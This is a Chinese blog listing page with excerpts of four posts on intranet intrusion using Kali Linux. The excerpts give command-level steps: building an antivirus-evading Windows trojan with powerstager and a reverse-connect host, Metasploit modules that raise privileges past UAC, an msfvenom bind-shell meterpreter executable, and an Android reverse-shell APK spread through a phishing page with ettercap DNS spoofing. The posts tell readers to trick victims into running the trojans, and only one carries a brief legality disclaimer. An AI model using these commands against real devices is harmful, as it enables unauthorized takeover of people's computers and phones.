TypechoJoeTheme

院长技术

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 20 篇与 KALI 的结果
2020-08-18

KALI 内网渗透记录

KALI 内网渗透记录
前期准备虚拟机 KALI: 192.168.180.128目标机器: 192.168.1.52初始化执行下面命令 进行初始化# msfdb init # service postgresql start 免杀木马制作安装powerstager制作免杀shell# apt-get install python3 # apt-get install mingw-w64 # git clone https://github.com/z0noxz/powerstager # cd powerstager # ./setup.py install开始生成木马# python3 powerstager.py -m -t win64 --lhost=192.168.180.128 --lport=9055 -o /root/payload.exe注意: 需要将 lhost 和 lport 改成你自己的 IP 和 端口号,然后尽你自己的能力想把发让对方运行的木马。msfconsole设置监听在终端运行msfconsole命令后键入以下内容msf5 > use exploit/multi...
admin
2020-08-18

KALI,DevOps

17 阅读
0 评论
2020年08月18日
17 阅读
0 评论
2020-08-18

KALI拿到shell后提权操作

KALI拿到shell后提权操作
利用KALI 进行程序提权操作UAC Exploit/windows/local/ask 模块提权介绍:使用: Exploit/windows/local/ask 该命令会在目标机器上弹出需要来自管理员权限的对话框,对方点击‘是’则可将程序权限提至最高级别并未绕过UAC1.拿到session后将session放入后台2.执行 use exploit windows/local/ask 使用ask模块3.在ask模块中首先设置你的session会话的IDset session id4.ask模块中也可以设置弹出框的名字表示哪个应用需要来自管理员权限set filename QQ.exe5.其他的无需设置直接发起攻击exploit目标情况:如过对方选择“是” 那么会生成一个新的session对话 如果 对方选择“否”那么该攻击会在一段时间显示超时进入到新创建的会话中后我们再次执行getsystem命令进行提权UAC绕过来提权上面的提权操作附有交互性,对于警惕性很高的人来说一般不会轻易的点击"是"下面我们使用一种在对方不知不觉的情况下进行UAC绕过来进行权限的提升。模块:Exploit...
admin
2020-08-18

KALI,DevOps

17 阅读
0 评论
2020年08月18日
17 阅读
0 评论
2020-08-18

Kali内网使用正向shell入侵

Kali内网使用正向shell入侵
利用KALI生成正向shell木马生成正向shell使用以下命令生成shell木马msfvenom -p windows/meterpreter/bind_tcp lport=9055 -f exe -o /root/桌面/正向shell.exe设置payloaduse exploit/multi/handler set payload windows/meterpreter/bind_tcp设置目标IP和监听端口set lport 9055 set rhost IP在目标机器运行木马后,在kali主机中执行run命令即可拿到shell
admin
2020-08-18

KALI,DevOps

39 阅读
0 评论
2020年08月18日
39 阅读
0 评论
2020-08-18

Kali利用Android木马渗透手机(高级篇)

Kali利用Android木马渗透手机(高级篇)
利用DNS劫持内网准备钓鱼网页诱导下载安装安卓木马前言内网渗透,非公网IP上线。不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏互联网非法外之地,还请各位兄弟谨记,且行且珍惜。第一步生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk第二步制作钓鱼网页在这里我已经简单的准备了一个页面代码如下将生成的木马和编写页面放置到/var/www/html/目录下然后启动Apache2systemctl start apache2第三步开启DNS劫持*编辑ettercap的DNS文件nano /etc/ettercap/etter.dns*启动ettercapettercap -G*操作步骤在弹出的窗口选择自己的网卡然后扫描内网IP选择网关 add to target 1选择目标 add to target 2点击图中的菜单在之后弹出的选项中选择第一个然后确定然后我们开启攻击开启攻击后我们打开插件双击dns_spoof进行DNS毒化操作手机端状态此时我...
admin
2020-08-18

KALI,DevOps

24 阅读
0 评论
2020年08月18日
24 阅读
0 评论
IP信息

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

今日天气

百度实时热点

  • 获取失败!